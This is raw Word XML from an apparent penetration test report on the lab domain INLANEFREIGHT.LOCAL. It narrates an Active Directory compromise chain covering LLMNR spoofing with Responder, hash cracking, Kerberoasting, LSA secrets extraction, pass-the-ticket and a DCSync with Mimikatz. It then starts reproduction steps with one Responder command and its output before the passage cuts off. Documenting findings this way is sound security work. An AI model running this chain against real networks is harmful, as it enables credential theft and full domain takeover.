        <w:t xml:space="preserve">performed the following to </w:t>
      </w:r>
      <w:r w:rsidR="00305619">
        <w:t xml:space="preserve">fully compromise the </w:t>
      </w:r>
      <w:r w:rsidR="00442CC7" w:rsidRPr="00442CC7">
        <w:t>INLANEFREIGHT.LOCAL</w:t>
      </w:r>
      <w:r w:rsidR="00305619" w:rsidRPr="00442CC7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00305619">
        <w:t>domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFCD0AE" w14:textId="2CB5E593" w:rsidR="0049567A" w:rsidRDefault="0049567A" w:rsidP="0049567A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0049567A">
        <w:t xml:space="preserve">The tester utilized the </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="0049567A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Responder</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0049567A">
        <w:t xml:space="preserve"> tool to obtain an NTLMv2 password hash for a domain user, </w:t>
      </w:r>
      <w:r w:rsidRPr="003D5536">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>bsmith.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0276D4A4" w14:textId="57758858" w:rsidR="0049567A" w:rsidRDefault="0049567A" w:rsidP="0049567A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0049567A">
        <w:t xml:space="preserve">This password hash was successfully cracked offline using the </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="0049567A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Hashcat</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0049567A">
        <w:t xml:space="preserve"> tool to reveal the user's </w:t>
      </w:r>
      <w:r w:rsidR="00BF25A8" w:rsidRPr="0049567A">
        <w:t>clear text</w:t>
      </w:r>
      <w:r w:rsidRPr="0049567A">
        <w:t xml:space="preserve"> password which granted a foothold into the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D5536">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>INLANEFREIGHT.LOCAL</w:t>
      </w:r>
      <w:r w:rsidRPr="0049567A">
        <w:t xml:space="preserve"> domain, but with no more privileges than a standard domain user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDB50D3" w14:textId="7D2520D2" w:rsidR="0049567A" w:rsidRDefault="0049567A" w:rsidP="0049567A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0049567A">
        <w:t xml:space="preserve">The tester then ran the </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="0049567A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>BloodHound.py</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0049567A">
        <w:t xml:space="preserve">, a Python version of the popular </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidRPr="0049567A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>SharpHound</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0049567A">
        <w:t xml:space="preserve"> collection tool to enumerate the domain and create visual representations of attack paths. Upon review, the tester found that multiple privileged users existed in the domain configured with Service Principal Names (SPNs), which can be leveraged to perform a Kerberoasting attack and retrieve TGS Kerberos tickets for the accounts which can be cracked offline using </w:t>
      </w:r>
      <w:r w:rsidRPr="003D5536">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>Hashcat</w:t>
      </w:r>
      <w:r w:rsidRPr="0049567A">
        <w:t xml:space="preserve"> if a weak password is set. From here, the tester used the </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="0049567A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>GetUserSPNs.py</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0049567A">
        <w:t xml:space="preserve"> tool to carry out a targeted Kerberoasting attack against the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D5536">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>mssqlsvc</w:t>
      </w:r>
      <w:r w:rsidRPr="0049567A">
        <w:t xml:space="preserve"> account, having found that the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D5536">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>mssqlsvc</w:t>
      </w:r>
      <w:r w:rsidRPr="0049567A">
        <w:t xml:space="preserve"> account had local administrator rights over the host </w:t>
      </w:r>
      <w:r w:rsidRPr="003D5536">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>SQL01.INLANEFREIGHT.LOCAL</w:t>
      </w:r>
      <w:r w:rsidRPr="0049567A">
        <w:t xml:space="preserve"> which was an interesting target in the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A76B94B" w14:textId="2C8B1996" w:rsidR="0049567A" w:rsidRDefault="0049567A" w:rsidP="0049567A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0049567A">
        <w:t xml:space="preserve">The tester was able to successfully crack this account's password offline, revealing the </w:t>
      </w:r>
      <w:r w:rsidR="00BF25A8" w:rsidRPr="0049567A">
        <w:t>clear text</w:t>
      </w:r>
      <w:r w:rsidRPr="0049567A">
        <w:t xml:space="preserve"> value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BBBE6E" w14:textId="4A956391" w:rsidR="0049567A" w:rsidRDefault="0049567A" w:rsidP="0049567A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0049567A">
        <w:t xml:space="preserve">The tester was able to authenticate to the host </w:t>
      </w:r>
      <w:r w:rsidRPr="003D5536">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>SQL01.INLANEFREIGHT.LOCAL</w:t>
      </w:r>
      <w:r w:rsidRPr="0049567A">
        <w:t xml:space="preserve"> and retrieve a </w:t>
      </w:r>
      <w:r w:rsidR="00BF25A8" w:rsidRPr="0049567A">
        <w:t>clear text</w:t>
      </w:r>
      <w:r w:rsidRPr="0049567A">
        <w:t xml:space="preserve"> password from the host's registry by decrypting LSA secrets for an account (</w:t>
      </w:r>
      <w:r w:rsidRPr="003D5536">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>srvadmin</w:t>
      </w:r>
      <w:r w:rsidRPr="0049567A">
        <w:t>) which was set up for autologon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B86CBA9" w14:textId="3D34EBD5" w:rsidR="0049567A" w:rsidRDefault="0049567A" w:rsidP="0049567A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0049567A">
        <w:t xml:space="preserve">This </w:t>
      </w:r>
      <w:r w:rsidRPr="003D5536">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>srvadmin</w:t>
      </w:r>
      <w:r w:rsidRPr="0049567A">
        <w:t xml:space="preserve"> account had local administrator rights over all servers (aside from Domain Controllers) in the domain so the tester was able to log into the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D5536">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>MS01.INLANEFREIGHT.LOCAL</w:t>
      </w:r>
      <w:r w:rsidRPr="0049567A">
        <w:t xml:space="preserve"> host and retrieve a </w:t>
      </w:r>
      <w:r w:rsidR="00BF25A8" w:rsidRPr="0049567A">
        <w:t>Kerberos</w:t>
      </w:r>
      <w:r w:rsidRPr="0049567A">
        <w:t xml:space="preserve"> TGT ticket for a logged in user, </w:t>
      </w:r>
      <w:r w:rsidRPr="003D5536">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>pramirez</w:t>
      </w:r>
      <w:r w:rsidRPr="0049567A">
        <w:t xml:space="preserve">, who was part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D5536">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>Tier I Server Admins</w:t>
      </w:r>
      <w:r w:rsidRPr="0049567A">
        <w:t xml:space="preserve"> group which granted the account DCSync rights over the domain object. This attack can be utilized to retrieve the NTLM password hash for any user in the domain, resulting in domain compromise and persistence via a Golden Ticket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185564F0" w14:textId="14F43E36" w:rsidR="0049567A" w:rsidRDefault="0049567A" w:rsidP="0049567A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0049567A">
        <w:t xml:space="preserve">The tester used the </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="0049567A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Rubeus</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0049567A">
        <w:t xml:space="preserve"> tool to extract the Kerberos TGT ticket for the </w:t>
      </w:r>
      <w:r w:rsidRPr="003D5536">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>pramirez</w:t>
      </w:r>
      <w:r w:rsidRPr="0049567A">
        <w:t xml:space="preserve"> user and perform a Pass-the-Ticket attack to authenticate as this user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5722776D" w14:textId="258E1107" w:rsidR="00305619" w:rsidRDefault="0049567A" w:rsidP="0049567A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0049567A">
        <w:t xml:space="preserve">Finally, the tester was able to perform a DCSync attack after successfully authenticating with this user account via the </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="0049567A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Mimikatz</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0049567A">
        <w:t xml:space="preserve"> tool which ended in domain compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61860D71" w14:textId="77777777" w:rsidR="00881DF1" w:rsidRDefault="00881DF1" w:rsidP="00881DF1">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="154342C7" w14:textId="77777777" w:rsidR="00BF25A8" w:rsidRDefault="00BF25A8">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F90CD89" w14:textId="3248286A" w:rsidR="00881DF1" w:rsidRPr="00881DF1" w:rsidRDefault="00881DF1" w:rsidP="00881DF1">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00881DF1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Detailed reproduction steps for this attack chain are as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5129F13C" w14:textId="77777777" w:rsidR="00881DF1" w:rsidRPr="00881DF1" w:rsidRDefault="00881DF1" w:rsidP="00881DF1">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00881DF1">
        <w:t>Upon connecting to the network, the tester started the Responder tool and was able to capture a password hash for the </w:t>
      </w:r>
      <w:r w:rsidRPr="00881DF1">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:color w:val="9FEF00"/>
        </w:rPr>
        <w:t>bsmith</w:t>
      </w:r>
      <w:r w:rsidRPr="00881DF1">
        <w:t> user by spoofing NBT-NS/LLMNR traffic on the local network segment.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGridLight"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10800"/>
      </w:tblGrid>
      <w:tr w:rsidR="00305619" w14:paraId="03239096" w14:textId="77777777" w:rsidTr="004539C5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F4EBFCD" w14:textId="77777777" w:rsidR="0049567A" w:rsidRPr="00F43CFC" w:rsidRDefault="00305619" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">$ </w:t>
            </w:r>
            <w:r w:rsidR="0049567A" w:rsidRPr="00F43CFC">
              <w:rPr>
                <w:color w:val="0000FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>sudo responder -I eth0 -wrfv</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B20EF8B" w14:textId="77777777" w:rsidR="0049567A" w:rsidRPr="0049567A" w:rsidRDefault="0049567A" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="299279B2" w14:textId="77777777" w:rsidR="0049567A" w:rsidRPr="0049567A" w:rsidRDefault="0049567A" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">                                         __</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73535F1A" w14:textId="77777777" w:rsidR="0049567A" w:rsidRPr="0049567A" w:rsidRDefault="0049567A" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  .----.-----.-----.-----.-----.-----.--|  |.-----.----.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6074668C" w14:textId="77777777" w:rsidR="0049567A" w:rsidRPr="0049567A" w:rsidRDefault="0049567A" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C8EFDAC" w14:textId="77777777" w:rsidR="0049567A" w:rsidRPr="0049567A" w:rsidRDefault="0049567A" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">  |__| |_____|_____|   __|_____|__|__|_____||_____|__|</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44A69024" w14:textId="77777777" w:rsidR="0049567A" w:rsidRPr="0049567A" w:rsidRDefault="0049567A" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">                   |__|</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44F49B35" w14:textId="77777777" w:rsidR="0049567A" w:rsidRPr="0049567A" w:rsidRDefault="0049567A" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="76F309D5" w14:textId="77777777" w:rsidR="0049567A" w:rsidRPr="0049567A" w:rsidRDefault="0049567A" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">           NBT-NS, LLMNR &amp; MDNS Responder 3.0.6.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64CD1874" w14:textId="77777777" w:rsidR="0049567A" w:rsidRPr="0049567A" w:rsidRDefault="0049567A" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2B2FFF85" w14:textId="77777777" w:rsidR="0049567A" w:rsidRPr="0049567A" w:rsidRDefault="0049567A" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;SNIP&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B6A61F0" w14:textId="77777777" w:rsidR="0049567A" w:rsidRPr="0049567A" w:rsidRDefault="0049567A" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6B3C1F1C" w14:textId="77777777" w:rsidR="0049567A" w:rsidRPr="0049567A" w:rsidRDefault="0049567A" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[+] Generic Options:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C8256CD" w14:textId="77777777" w:rsidR="0049567A" w:rsidRPr="0049567A" w:rsidRDefault="0049567A" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    Responder NIC              [eth0]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F48EA63" w14:textId="77777777" w:rsidR="0049567A" w:rsidRPr="0049567A" w:rsidRDefault="0049567A" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    Responder IP               [192.168.195.168]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B54B1CE" w14:textId="77777777" w:rsidR="0049567A" w:rsidRPr="0049567A" w:rsidRDefault="0049567A" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    Challenge set              [random]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B35FD83" w14:textId="77777777" w:rsidR="0049567A" w:rsidRPr="0049567A" w:rsidRDefault="0049567A" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    Don't Respond To Names     ['ISATAP']</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="014B3D9F" w14:textId="77777777" w:rsidR="0049567A" w:rsidRPr="0049567A" w:rsidRDefault="0049567A" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3E87A4A0" w14:textId="77777777" w:rsidR="0049567A" w:rsidRPr="0049567A" w:rsidRDefault="0049567A" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[+] Current Session Variables:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74C359E0" w14:textId="77777777" w:rsidR="0049567A" w:rsidRPr="0049567A" w:rsidRDefault="0049567A" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    Responder Machine Name     [WIN-TWWXTGD94CV]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="055BE42F" w14:textId="77777777" w:rsidR="0049567A" w:rsidRPr="0049567A" w:rsidRDefault="0049567A" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    Responder Domain Name      [3BKZ.LOCAL]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="314D91A7" w14:textId="77777777" w:rsidR="0049567A" w:rsidRPr="0049567A" w:rsidRDefault="0049567A" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    Responder DCE-RPC Port     [47032]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07D97E73" w14:textId="77777777" w:rsidR="0049567A" w:rsidRPr="0049567A" w:rsidRDefault="0049567A" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3DD4BFE5" w14:textId="77777777" w:rsidR="0049567A" w:rsidRPr="0049567A" w:rsidRDefault="0049567A" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0049567A">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>[+] Listening for events...</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25D27DEC" w14:textId="77777777" w:rsidR="0049567A" w:rsidRPr="0049567A" w:rsidRDefault="0049567A" w:rsidP="006E787B">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="17359663" w14:textId="77777777" w:rsidR="0049567A" w:rsidRPr="0049567A" w:rsidRDefault="0049567A" w:rsidP="006E787B">
